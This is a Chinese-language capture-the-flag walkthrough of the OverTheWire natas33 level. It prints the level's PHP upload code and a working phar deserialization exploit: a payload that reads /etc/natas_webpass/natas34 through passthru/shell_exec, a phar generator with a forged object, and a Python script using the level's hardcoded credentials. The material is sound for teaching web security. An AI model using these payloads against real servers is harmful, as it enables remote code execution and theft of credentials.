我们打开关卡lv33,登陆查看信息
是一个上传文件的页面
应该是做了很多过滤
查看源码
// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
private $filename=""; //三个私有参数
private $signature='adeafbadbabec0dedabada55ba55d00d';
private $init=False;
function __construct(){ //类创建时调用
$this->filename=$_POST["filename"];
if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) { //限制文件大小
echo "File is too big<br>";
}
else { //将文件移动到/natas33/upload/目录下
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
echo "Firmware upgrad initialised.<br>";
}
else{
echo "There was an error uploading the file, please try again!<br>";
}
}
}
function __destruct(){ //类销毁时调用
// upgrade firmware at the end of this script
// "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
if(getcwd() === "/") chdir("/natas33/uploads/"); //getchwd() 函数返回当前工作目录。chdir() 函数改变当前的目录。
if(md5_file($this->filename) == $this->signature){ //md5_file() 函数计算文件的 MD5 散列。
echo "Congratulations! Running firmware update: $this->filename <br>";
passthru("php " . $this->filename); //执行外部命令
}
else{
echo "Failur! MD5sum mismatch!<br>";
}
}
}
session_start();
if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
new Executor();
}
查询大神的思路
思路是反序列化漏洞
按照思路
test.php
<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>
打开bp拦截
1、我们先上传查看密码的php文件
上传test.php
点击上传
修改名字
主要是与phar文件相对应
提示md5的值不对
2、我们再上传phar文件
拦截
修改名字
修改名字方便执行
成功上传
我们执行
重新上传一遍
只是修改下名字
出现报错
名字错了
我们重新来一遍
使用python脚本
natas33solution.py
import subprocess
import re
import requests
from requests.auth import HTTPBasicAuth
def get_pass():
auth = HTTPBasicAuth('natas33', 'APwWDD3fRAf6226sgBOBaSptGwvXwQhG')
phar_payload = {'uploadedfile': open('exploit.phar', 'rb')}
php_payload = {'uploadedfile': open('payload.php', 'rb')}
final_payload = {'uploadedfile': open('exploit.phar', 'rb')}
#Filename assignments for each payload
phar_data = {'filename':'taldgan.phar'}
php_data = {'filename':'taldgan.php'}
final_data = {'filename':'phar://taldgan.phar'}
#Need to make 3 request: 1 to upload the php payload, 1 to upload the phar, and 1 to read the phar with phar://taldgan.phar as the filename
requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=phar_payload, data=phar_data)
requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=php_payload, data=php_data)
r = requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=final_payload, data=final_data)
passreg = '[a-zA-Z0-9]{32}'
print(re.findall(passreg, r.text)[0])
if __name__ == "__main__":
get_pass()
附属的文件为
gen_phar_payload.php
<?php
// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
private $filename='taldgan.php';
private $signature='6ae14bb82be23c2cbd46a47366cf08c0';
}
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString("payload.php", "payload");
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$object = new Executor();
$phar->setMetadata($object);
$phar->stopBuffering();
?>
md5payload
<?php
print md5_file($argv[1]) . "\n";
?>
payload.php
<?php passthru('cat /etc/natas_webpass/natas34'); ?>
我们使用vscode跑
等待结果
由于natas34打不开,无法验证密码。
等网络好一点,再试一试